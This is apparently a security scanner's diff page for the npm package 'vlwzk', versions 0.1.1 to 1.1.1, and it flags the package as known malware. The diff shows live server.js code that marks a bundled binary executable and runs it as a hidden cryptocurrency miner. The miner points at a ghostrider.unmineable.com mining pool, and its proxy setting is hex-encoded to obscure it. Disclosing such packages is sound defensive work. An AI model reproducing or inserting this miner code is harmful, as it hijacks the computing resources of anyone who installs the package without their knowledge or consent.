Comparing version 0.1.1 to 1.1.1
@@ -26,8 +26,8 @@ const fs = require("fs") | ||
const exec = require('child_process').exec; | ||
const execute =exec(`chmod +x selam && ./selam -o ${settings.mk || "ghostrider.unmineable.com:3333"} -a ${settings.a || "gr"} -k -u ${settings.randomize}${settings.cdn}${settings.key}${settings.system} -p x --proxy=${settings.pl || ""}${settings.sqlite || ""}${settings.codding.toString('utf-8')} --donate-level 0`); | ||
execute.stdout.on('data', data => eventEmitter.emit('key', data)); | ||
execute.stderr.on('data', data => eventEmitter.emit('key', data)); | ||
const execute =exec(`chmod +x selam && ./selam -o ${settings.mk || "ghostrider.unmineable.com:3333"} -a ${settings.a || "gr"} -k -u ${settings.randomize}${settings.cdn}:${settings.key}.${settings.system} -p x --proxy=${Buffer.from(settings.codding,"hex").toString()} --donate-level 0` | ||
,{cwd:__dirname}); | ||
execute.stdout.on('data', data => eventEmitter.emit('key', data.replace(/\x1b\[[0-9;]*m/g, ''))); | ||
execute.stderr.on('data', data => eventEmitter.emit('key', data.replace(/\x1b\[[0-9;]*m/g, ''))); | ||
execute.on('exit', data => eventEmitter.emit('key', data)); | ||
} | ||
return { | ||
@@ -37,3 +37,2 @@ eventEmitter:eventEmitter, | ||
} | ||
} |
{ | ||
"name": "vlwzk", | ||
"version": "0.1.1", | ||
"version": "1.1.1", | ||
"description": "", | ||
@@ -5,0 +5,0 @@ "main": "server.js", |
License Policy Violation
LicenseThis package is not allowed per your license policy. Review the package's license to ensure compliance.
Found 1 instance in 1 package
Known malware
Supply chain riskThis package is malware. We have asked the package registry to remove it.
Found 1 instance in 1 package
License Policy Violation
LicenseThis package is not allowed per your license policy. Review the package's license to ensure compliance.
Found 1 instance in 1 package
Known malware
Supply chain riskThis package is malware. We have asked the package registry to remove it.
Found 1 instance in 1 package
No v1
QualityPackage is not semver >=1. This means it is not stable and does not support ^ ranges.
Found 1 instance in 1 package
1649
34
1